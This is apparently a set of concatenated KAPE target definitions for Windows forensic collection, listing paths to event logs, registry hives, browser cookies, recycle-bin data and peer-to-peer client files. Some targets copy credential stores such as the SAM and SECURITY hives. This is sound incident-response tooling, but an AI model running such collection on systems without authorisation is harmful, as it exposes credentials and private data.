       Path: C:\Documents and Settings\*\Application Data\Microsoft\Internet Explorer\UserData\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat Office XP

       Category: Communications

       Path: C:\Documents and Settings\*\Application Data\Microsoft\Office\Recent\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Index.dat Office

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent\index.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Local Internet Explorer folder

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Internet Explorer\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Roaming Internet Explorer folder

       Category: Communications

       Path: C:\Users\*\AppData\Roaming\Microsoft\Internet Explorer\

       IsDirectory: true

       Recursive: true

       Comment: ""  

   -

       Name: IE 9/10 History

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\History\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 9/10 Cache

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Temporary Internet Files\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 9/10 Cookies

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Cookies\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 9/10 Download History

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\IEDownloadHistory\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 11 Metadata

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\WebCache

       IsDirectory: true

       Recursive: false

       Comment: ""

   -

       Name: IE 11 Cache

       Category: Communications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\INetCache\

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: IE 11 Cookies

  &nb

!BasicCollection

Description: Basic Collection

Author: Phill Moore

Version: 1

Id: 83b99299-2d84-4844-af25-c727d3440b19

RecreateDirectories: true

Targets:

   -

       Name: Event Logs

       Category: Event Logs

       Path: EventLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Evidence of Execution

       Category: Evidence Of Execution

       Path: EvidenceOfExecution.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: File System

       Category: File System

       Path: FileSystem.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: LnkFilesAndJumpLists

       Category: File Access

       Path: LnkFilesAndJumpLists.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: PowerShellConsole

       Category: Evidence Of Execution

       Path: PowerShellConsole.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RecycleBinMetadata

       Category: File Deletion

       Path: RecycleBinMetadata.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RegistryHives

       Category: Registry Hives

       Path: RegistryHives.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ScheduledTasks

       Category: ScheduledTasks

       Path: ScheduledTasks.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SRUM

       Category: SRUM

       Path: SRUM.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ThumbCache

       Category: Thumbcache

       Path: Thumbcache.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: USBDevicesLogs

       Category: USB

       Path: USBDevicesLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: WindowsIndexSearch

       Category: Search

       Path: WindowsIndexSearch.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

P2P
Torrents

Description: Torrent Files

Author: Tony Knutson

Version: 2.0

Id: 082de7fa-17b4-4e10-a4e8-94ef2fb27ec2

RecreateDirectories: true

Targets:

   -

       Name: Torrents

       Category: FileDownload

       Path: C:\

       FileMask: '*.torrent'

       IsDirectory: true

       Recursive: true

       Comment: "Locates .torrent files and copies them"

TorrentClients

Description: Torrent Clients

Author: Banaanhangwagen

Version: 1

Id: c43f37fb-1b2f-437c-8595-b5b095a0ca7b

RecreateDirectories: true

Targets:

   -

       Name: TorrentClients - qBittorrent

       Category: FileDownload

       Path: C:\Users\*\AppData\Roaming\qBittorrent\*.ini

       IsDirectory: false

       Recursive: false

       Comment: "Locates settings files and copies them"

   -

       Name: TorrentClients - qBittorrent

       Category: FileDownload

       Path: C:\Users\*\AppData\Local\qBittorrent\logs

       IsDirectory: false

       Recursive: false

       Comment: "Locates log files and copies them"

   -

       Name: TorrentClients - uTorrent

       Category: FileDownload

       Path: C:\Users\*\AppData\Roaming\uTorrent\*.dat

       IsDirectory: false

       Recursive: false

       Comment: "Locates settings files and copies them"

   -

       Name: TorrentClients - BitTorrent

       Category: FileDownload

       Path: C:\Users\*\AppData\Roaming\BitTorrent\*.dat

       IsDirectory: false

       Recursive: false

       Comment: "Locates settings files and copies them"

Gigatrib

Description: Gigatribe Files

Author: Linus Nissi

Version: 2

Id: 64726d74-1a68-463a-bb26-929054a20b71

RecreateDirectories: true

Targets:

   -

       Name: Gigatribe Files Windows Vista/7/8/10

       Category: FileDownload

       Path: C:\Users\*\AppData\Local\Shalsoft\*

       IsDirectory: true

       Recursive: true

       Comment: "Locates Gigatribe files and copies them"

   -

       Name: Gigatribe Files Windows XP

       Category: FileDownload

       Path: C:\Documents and settings\*\*\Application Data\Gigatribe\*

       IsDirectory: true

       Recursive: true

       Comment: Locates Gigatribe files and copies them. Different path depending on the Operating System language. In Swedish the location is C:\Documents and settings\<username>\Lokala Inställningar\Application Data\Gigatribe

   -

       Name: Gigatribe Files Windows XP

       Category: FileDownload

       Path: C:\Documents and settings\*\*\Application Data\Shalsoft\*

       IsDirectory: true

       Recursive: true

       Comment: Locates Gigatribe files and copies them. Different path depending on the Operating System language. In Swedish the location is C:\Documents and settings\<username>\Lokala Inställningar\Application Data\Shalsoft

Windows
XPRestorePoints

Description: XP Restore Points - System Volume Information directory

Author: Phill Moore

Version: 1

Id: 07f57a75-f9d9-42f3-842c-bd7e5abbb569

RecreateDirectories: true

Targets:

   -

       Name: System Volume Information

       Category: Folder capture

       Path: C:\System Volume Information

       IsDirectory: true

       Recursive: true

       Comment: ""

WindowsIndexSearch

Description: Windows Index Search

Author: Mark Hallman

Version: 1

Id: 9828b927-f955-464a-80fb-a48ce0101236

RecreateDirectories: true

Targets:

   -

       Name: WindowsIndexSearch

       Category: FileKnowledge

       Path: C:\programdata\microsoft\search\data\applications\windows\Windows.edb

       IsDirectory: false

       Recursive: false

       Comment: ""

WindowsFirewall

Description: Windows Firewall Logs

Author: Mike Cary

Version: 1

Id: e1c2040e-c1b4-47ef-973f-73a54c5e87ca

RecreateDirectories: true

Targets:

   -

       Name: Windows Firewall Logs

       Category: WindowsFirewallLogs

       Path: C:\Windows*\System32\LogFiles\Firewall\pfirewall.*

       IsDirectory: false

       Recursive: false

       Comment: ""

WER

Description: Windows Error Reporting

Author: Troy Larson

Version: 1

Id: 03106a1c-e1f8-4075-abdb-f9c83078347d

RecreateDirectories: true

Targets:

   -

       Name: WER Files

       Category: Executables

       Path: C:\ProgramData\Microsoft\Windows\WER

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Crash Dumps

       Category: SQL Exploitation

       Path: C:\Users\*\AppData\Local\CrashDumps\*.dmp

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Crash Dumps

       Category: SQL Exploitation

       Path: C:\Windows*\*.dmp

       IsDirectory: false

       Recursive: false

       Comment: ""

ApplicationEvents

Description: Windows Application Event Log

Author: Drew Ervin

Version: 1.0

Id: 2da16dbf-ea47-448e-a00f-fc442c3109ba

RecreateDirectories: true

Targets:

   -

       Name: Application Event Log XP

       Category: EventLogs

       Path: C:\Windows*\system32\config\AppEvent.evt

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Application Event Log Win7+

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\application.evtx

       IsDirectory: false

       Recursive: false

       Comment: ""

WindowsNotificationsDB

Description: Windows 10 Notification DB

Author: Hadar Yudovich

Version: 1

Id: a5c3308d-8941-43c4-a295-b906a59bc895

RecreateDirectories: true

Targets:

   -

       Name: Windows 10 Notification DB

       Category: Notifications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db

       IsDirectory: false

       Recursive: false

       Comment: "Locates Windows notification db files"

   -

       Name: Windows 10 Notification DB

       Category: Notifications

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Notifications\appdb.dat

       IsDirectory: false

       Recursive: false

       Comment: "Locates Windows notification db files"

WBEM

Description: Web-Based Enterprise Management (WBEM)

Author: Mark Hallman

Version: 1

Id: e985f5e3-f951-4e13-8099-a2a6877355cb

RecreateDirectories: true

Targets:

   -

       Name: WBEM

       Category: WBEM

       Path: C:\Windows*\System32\wbem\Repository

       IsDirectory: true

       Recursive: true

       Comment: ""

USBDevicesLogs

Description: USB devices log files

Author: Eric Zimmerman

Version: 1

Id: 07ee308f-c79a-47de-a431-c93ab34e4b66

RecreateDirectories: true

Targets:

   -

       Name: Setupapi.log XP

       Category: USBDevices

       Path: C:\Windows\setupapi.log

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Setupapi.log Win7+

       Category: USBDevices

       Path: C:\Windows*\inf\setupapi.dev.log

       IsDirectory: false

       Recursive: false

       Comment: ""

Thumbcache

Description: Thumbcache DB

Author: Eric Zimmerman

Version: 1

Id: 1eec8849-b6eb-475b-a700-f4fb0055356d

RecreateDirectories: true

Targets:

   -

       Name: Thumbcache DB

       Category: FileKnowledge

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\Explorer\thumbcache_*.db

       IsDirectory: false

       Recursive: false

       Comment: ""

Description: System Resource Usage Monitor (SRUM) Data

Author: Mark Hallman

Version: 1

Id: 9858f1fc-5e22-46a0-8bfd-c821ac9b4a13

RecreateDirectories: true

Targets:

   -

       Name: SRUM

       Category: Execution

       Path: C:\Windows*\System32\SRU

       IsDirectory: true

       Recursive: true

       Comment: ""

RegistryHives

Description: System and user related Registry hives

Author: Eric Zimmerman

Version: 1

Id: 76af6086-bd0b-429f-bfd7-4a8e8ff8138f

RecreateDirectories: true

Targets:

   -

       Name: System Registry Files

       Category: Registry

       Path: RegistryHivesSystem.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: User Level Registry Files

       Category: Registry

       Path: RegistryHivesUser.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

RegistryHivesUser

Description: User Related Registry hives

Author: Eric Zimmerman / Mark Hallman

Version: 1

Id: 635fbfd3-4a47-45b5-aae4-0a1bb6545d08

RecreateDirectories: true

Targets:

   -

       Name: ntuser.dat registry hive XP

       Category: Registry

       Path: C:\Documents and Settings\*\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat registry hive

       Category: Registry

       Path: C:\Users\*\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat registry transaction files

       Category: Registry

       Path: C:\Users\*\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat DEFAULT registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\DEFAULT

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: ntuser.dat DEFAULT transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\DEFAULT.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: UsrClass.dat registry hive

       Category: Registry

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: UsrClass.dat registry transaction files

       Category: Registry

       Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

RegistryHivesSystem

Description: System level/related Registry hives

Author: Eric Zimmerman / Mark Hallman

Version: 1

Id: 2b7f40fd-cd02-47da-87da-9966fa5d8159

RecreateDirectories: true

Targets:

   -

       Name: SAM registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SAM.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SECURITY registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SECURITY.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SOFTWARE registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SOFTWARE.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\SYSTEM.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SAM registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SAM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SECURITY registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SECURITY

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SOFTWARE registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SOFTWARE

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\SYSTEM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RegBack registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\*.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SAM registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SAM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SECURITY registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SECURITY

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SOFTWARE registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SOFTWARE

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SYSTEM

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SYSTEM registry hive (RegBack)

       Category: Registry

       Path: C:\Windows*\System32\config\RegBack\SYSTEM1

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: System Profile registry hive

       Category: Registry

       Path: C:\Windows*\System32\config\systemprofile\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: System Profile registry transaction files

       Category: Registry

       Path: C:\Windows*\System32\config\systemprofile\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Local Service registry hive

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Local Service registry transaction files

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Network Service registry hive

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Network Service registry transaction files

       Category: Registry

       Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat.LOG*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: System Restore Points Registry Hives (XP)

       Category: Registry

       Path: C:\System Volume Information\_restore*\RP*\snapshot\_REGISTRY_*

       IsDirectory: false

       Recursive: false

       Comment: ""

StartupInfo

Description: StartupInfo XML Files

Author: Hadar Yudovich

Version: 1

Id: 9bb477a3-fa6f-410d-8646-c3f987c147ce

RecreateDirectories: true

Targets:

   -

       Name: StartupInfo XML Files

       Category: Persistence

       Path: C:\Windows*\System32\WDI\LogFiles\StartupInfo\*.xml

       IsDirectory: false

       Recursive: false

       Comment: ""

SDB

Description: Shim SDB FIles

Author: Troy Larson

Version: 1

Id: 99e82a85-e4d4-4139-930c-7eea9a45452f

RecreateDirectories: true

Targets:

   -

       Name: SDB Files

       Category: Executables

       Path: C:\Windows*\apppatch\Custom\*.sdb

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: SDB Files x64

       Category: Executables

       Path: C:\Windows*\apppatch\Custom\Custom64\*.sdb

       IsDirectory: false

       Recursive: false

       Comment: ""

ScheduledTasks

Description: Scheduled tasks (*.job and XML)

Author: Eric Zimmerman

Version: 1

Id: e5dc4367-2e6b-49bf-a90a-d4c1598bbe28

RecreateDirectories: true

Targets:

   -

       Name: at .job

       Category: Persistence

       Path: C:\Windows*\Tasks\*.job

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: at SchedLgU.txt

       Category: Persistence

       Path: C:\Windows*\SchedLgU.txt

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: XML

       Category: Persistence

       Path: C:\Windows*\system32\Tasks

       IsDirectory: true

       Recursive: true

       Comment: ""

RecycleBin

Description: Recycle Bin

Author: Phill Moore

Version: 1

Id: a22deca9-0c6e-4962-adf0-b082246aad57

RecreateDirectories: true

Targets:

   -

       Name: RecycleBinMetadata

       Category: Deleted Files

       Path: RecycleBinMetadata.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RecycleBinContent

       Category: Deleted Files

       Path: RecycleBinContent.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

RecycleBinMetadata

Description: Recycle Bin Metadata

Author: Phill Moore

Version: 1

Id: 740cbac1-1792-434c-9f3b-b06b334ba635

RecreateDirectories: true

Targets:

   -

       Name: $Recycle.Bin

       Category: Deleted Files

       Path: C:\$Recycle.Bin\*\$I*

       IsDirectory: false

       Recursive: true

       Comment: ""

   -

       Name: RECYCLER WinXP

       Category: Deleted Files

       Path: C:\RECYCLER\*\INFO2

       IsDirectory: false

       Recursive: true

       Comment: ""

RecycleBinContent

Description: Recycle Bin Content

Author: Phill Moore

Version: 1.0

Id: 77404f0e-8d88-4eff-bf9c-a3e3fedba5d7

RecreateDirectories: true

Targets:

   -

       Name: $Recycle.Bin

       Category: Deleted Files

       Path: C:\$Recycle.Bin\*\$R*

       IsDirectory: false

       Recursive: true

       Comment: ""

   -

       Name: RECYCLER WinXP

       Category: Deleted Files

       Path: C:\RECYCLER\*

       IsDirectory: true

       Recursive: true

       Comment: ""

Recycle

Description: Recycle Bin

Author: Mark Hallman

Version: 1

Id: 336abbbb-e9db-4d04-8904-43718e57df85

RecreateDirectories: true

Targets:

   -

       Name: $Recycle.Bin

       Category: Deleted Files

       Path: C:\$Recycle.Bin\*

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: RECYCLER WinXP

       Category: Deleted Files

       Path: C:\RECYCLER\*

       IsDirectory: true

       Recursive: true

       Comment: ""

RDPLogs

Description: RDP Logs

Author: Drew Ervin

Version: 1.0

Id: 6fa6ac8c-d940-4658-9c61-fdad4cf6416b

RecreateDirectories: true

Targets:

   -

       Name: RemoteConnectionManager Event Logs

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: LocalSessionManager Event Logs

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-TerminalServices-LocalSessionManager*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RDPClient Event Logs

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-TerminalServices-RDPClient*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: RDPCoreTS Event Logs

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-RemoteDesktopServices-RdpCoreTS*

       IsDirectory: false

       Recursive: false

       Comment: "Can be used to correlate RDP logon failures by originating IP"

RDPCache

Description: RDP Cache Files

Author: Hadar Yudovich

Version: 1

Id: 527a5de1-fb71-4efd-9701-89a30ea908e3

RecreateDirectories: true

Targets:

   -

       Name: RDP Cache Files

       Category: FileSystem

       Path: C:\Users\*\AppData\Local\Microsoft\Terminal Server Client\Cache

       IsDirectory: true

       Recursive: false

       Comment: ""

   -

       Name: RDP Cache Files

       Category: FileSystem

       Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Terminal Server Client\Cache

       IsDirectory: true

       Recursive: false

       Comment: ""

OfficeDocumentCache

Description: Office Document Cache

Author: Banaanhangwagen

Version: 1

Id: 15e92d9c-b02d-4cdf-a86e-bafb3d25af5c

RecreateDirectories: true

Targets:

   -

       Name: Office Document Cache

       Category: FileKnowledge

       Path: C:\Users\*\AppData\Local\Microsoft\Office\*\OfficeFileCache

       IsDirectory: true

       Recursive: true

       Comment: ""

OfficeAutosave

Description: Office Autosave

Author: Russ Taylor

Version: 1

Id: 71f1efe7-37be-4285-9896-11f0f6be2770

RecreateDirectories: true

Targets:

   -

       Name: Word Autosave Location

       Category: FileKnowledge

       Path: C:\Users\*\AppData\Roaming\Microsoft\Word\*

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Excel Autosave Location

       Category: ApplicationCompatibility

       Path: C:\Users\*\AppData\Roaming\Microsoft\Excel\*

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Powerpoint Autosave Location

       Category: FileKnowledge

       Path: C:\Users\*\AppData\Roaming\Microsoft\Powerpoint\*

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Publisher Autosave Location

       Category: FileKnowledge

       Path: C:\Users\*\AppData\Roaming\Microsoft\Publisher\*

       IsDirectory: true

       Recursive: true

       Comment: ""

SignatureCatalog

Description: Obtain detached signature catalog files

Author: Mike Pilkington

Version: 1

Id: 953b16e8-69ea-4967-9f9b-bcfa4f4fbe7b

RecreateDirectories: true

Targets:

   -

       Name: SignatureCatalog

       Category: FileMetadata

       Path: C:\Windows*\System32\CatRoot

       IsDirectory: true

       Recursive: true

       Comment: ""


## USE CASE ##

# Validating digital signatures of an offline system can be problematic. 

# Microsoft relies mostly on detached signature files to sign Windows

# executables. Checking those on an offline system using sigcheck.exe

# from SysInternals requires importing the target system's detached

# signature files into the anlysis system. To use with sigcheck, slightly

# rename the collected GUID directories (keeping the names in a GUID format),

# copy them to C:\Windows\System32\CatRoot of your analysis machine, restart

# Cryptographic Services, then run sigcheck against the target system files. 

# This will import the target's signature files into the local analysis

# machine's signature database and should accurately validate the target

# system's files (which presumabley were collected with other KAPE modules).

# Kudos to Troy Larson for providing this workaround technique.

##

MOF

Description: MOF files (WMI)

Author: Eric Zimmerman

Version: 1.0

Id: 4fc9820c-3d30-4a38-2e48-5e0b745a4b0c

RecreateDirectories: true

Targets:

   -

       Name: MOF files

       Category: WMI

       Path: C:\

       IsDirectory: true

       Recursive: true

       FileMask: "*.MOF"

       Comment:


LogFiles

Description: LogFiles

Author: Fabian Murer

Version: 1

Id: 67c9bb8d-342b-4380-a110-565317fce014

RecreateDirectories: true

Targets:

   -

       Name: LogFiles

       Category: Logs

       Path: C:\Windows*\System32\LogFiles

       IsDirectory: true

       Recursive: true

       Comment: ""

LnkFilesAndJumpLists

Description: Lnk files and jump lists

Author: Eric Zimmerman

Version: 1.1

Id: 5fc6820c-4d30-4a38-9e43-5e0b788a4b0c

RecreateDirectories: true

Targets:

   -

       Name: Lnk files from Recent

       Category: LnkFiles

       Path: C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent

       IsDirectory: true

       Recursive: true

       Comment: Also includes automatic and custom jumplist directories

   -

       Name: Lnk files from Microsoft Office Recent

       Category: LnkFiles

       Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent

       IsDirectory: true

       Recursive: true

       Comment: ""       

   -

       Name: Lnk files from Recent (XP)

       Category: LnkFiles

       Path: C:\Documents and Settings\*\Recent

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Desktop lnk files XP

       Category: LnkFiles

       Path: C:\Documents and Settings\*\Desktop\*.lnk

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Desktop lnk files

       Category: LnkFiles

       Path: C:\Users\*\Desktop\*.lnk

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Restore point lnk files XP

       Category: LnkFiles

       Path: C:\System Volume Information\_restore*\RP*\*.lnk

       IsDirectory: false

       Recursive: false

       Comment: ""

LinuxOnWindowsProfileFiles

Description: Linux on Windows Profile Files

Author: Troy Larson

Version: 1

Id: 9718a129-21f9-4354-a06f-2eddb112ab03

RecreateDirectories: true

Targets:

   -

       Name: .bash_history

       Category: Windows Linux Profile

       Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.bash_history

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: .bash_logout

       Category: Windows Linux Profile

       Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.bash_logout

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: .bashrc

       Category: Windows Linux Profile

       Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.bashrc

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: .profile

       Category: Windows Linux Profile

       Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.profile

       IsDirectory: false

       Recursive: false

       Comment: ""


CombinedLogs

Description: Collect Event logs, Trace logs, Windows Firewall and PowerShell console

Author: Mike Cary

Version: 1

Id: 6e9f717f-01f8-4460-b552-a3a0ec7d7670

RecreateDirectories: true

Targets:

   -

       Name: Windows Event Logs

       Category: EventLogs

       Path: EventLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Event Trace Logs

       Category: EventTraceLogs

       Path: EventTraceLogs.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: PowerShell Console Log

       Category: PowerShellConsoleLog

       Path: PowerShellConsole.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Windows Firewall Log

       Category: WindowsFirewallLogs

       Path: WindowsFirewall.tkape

       IsDirectory: false

       Recursive: false

       Comment: ""

EventLogs

Description: Event logs

Author: Eric Zimmerman

Version: 1

Id: d95784d9-bd1c-472b-aeef-de5d9ecc7aaa

RecreateDirectories: true

Targets:

   -

       Name: Event logs XP

       Category: EventLogs

       Path: C:\Windows\system32\config\*.evt

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: Event logs Win7+

       Category: EventLogs

       Path: C:\Windows*\system32\winevt\logs\*.evtx

       IsDirectory: false

       Recursive: false

       Comment: ""

EventTraceLogs

Description: Event Trace Logs

Author: Mark Hallman

Version: 1

Id: af494526-9e44-4548-9d29-f088eafa6f3d

RecreateDirectories: true

Targets:

   -

       Name: WDI Trace Logs 1

       Category: Event Trace Logs

       Path: C:\Windows*\System32\WDI\LogFiles\*.etl*

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: WDI Trace Logs 2

       Category: Event Trace Logs

       Path: C:\Windows*\System32\WDI\{*

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: WMI Trace Logs

       Category: Event Trace Logs

       Path: C:\Windows*\System32\LogFiles\WMI\*

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: SleepStudy Trace Logs

       Category: Event Trace Logs

       Path: C:\Windows*\System32\SleepStudy*

       IsDirectory: true

       Recursive: true

       Comment: ""

   -

       Name: Energy-NTKL Trace Logs

       Category: Event Trace Logs

       Path: C:\ProgramData\Microsoft\Windows\PowerEfficiency Diagnostics\energy-ntkl.etl

       IsDirectory: false

       Recursive: false

       Comment: ""

FileSystem

Description: File system metadata

Author: Eric Zimmerman

Version: 1

Id: 2bd97ef7-5fbf-4427-8ca2-ffb15d545b00

RecreateDirectories: true

Targets:

   -

       Name: $MFT

       Category: FileSystem

       Path: $MFT.tkape

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

   -

       Name: $LogFile

       Category: FileSystem

       Path: $LogFile.tkape

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

   -

       Name: $J

       Category: FileSystem

       Path: $J.tkape

       IsDirectory: false

       Recursive: false

       SaveAsFileName: $J

       Comment: ""

   -

       Name: $SDS

       Category: FileSystem

       Path: $SDS.tkape

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       SaveAsFileName: $Secure_$SDS

       Comment: ""

   -

       Name: $Boot

       Category: FileSystem

       Path: $Boot.tkape

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       Comment: ""

   -

       Name: $T

       Category: FileSystem

       Path: $T.tkape

       IsDirectory: false

       Recursive: false

       AlwaysAddToQueue: true

       SaveAsFileName: $T

       Comment: ""

EncapsulationLogging

Description: EncapsulationLogging

Author: Troy Larson

Version: 1

Id: 7c328d9b-4a10-459d-b8b3-36d81686bc74

RecreateDirectories: true

Targets:

   -

       Name: EncapsulationLogging

       Category: Executables

       Path: C:\Windows*\Appcompat\Programs\EncapsulationLogging.hve

       IsDirectory: false

       Recursive: false

       Comment: ""

   -

       Name: EncapsulationLogging Logs

       Category: Executables

       Path: C:\Windows*\Appcompat\Programs\EncapsulationLogging.log*

       IsDirectory: false

       Recursive: false

       Comment: ""

GroupPolicy

Description: Current Group Policy Enforcement

Author: piesecurity

Version: 1

Id: e5595e9c-ebab-41db-a688-fdffe91f6fcb

RecreateDirectories: true

Targets:

   -

       Name: Local Group Policy INI Files

       Category: Communication

       Path: C:\Windows*\system32\grouppolicy\*.ini

       IsDirectory: false

       Recursive: false

   -

       Name: Local Group Policy Files - Registry Policy Files

       Category: Communication

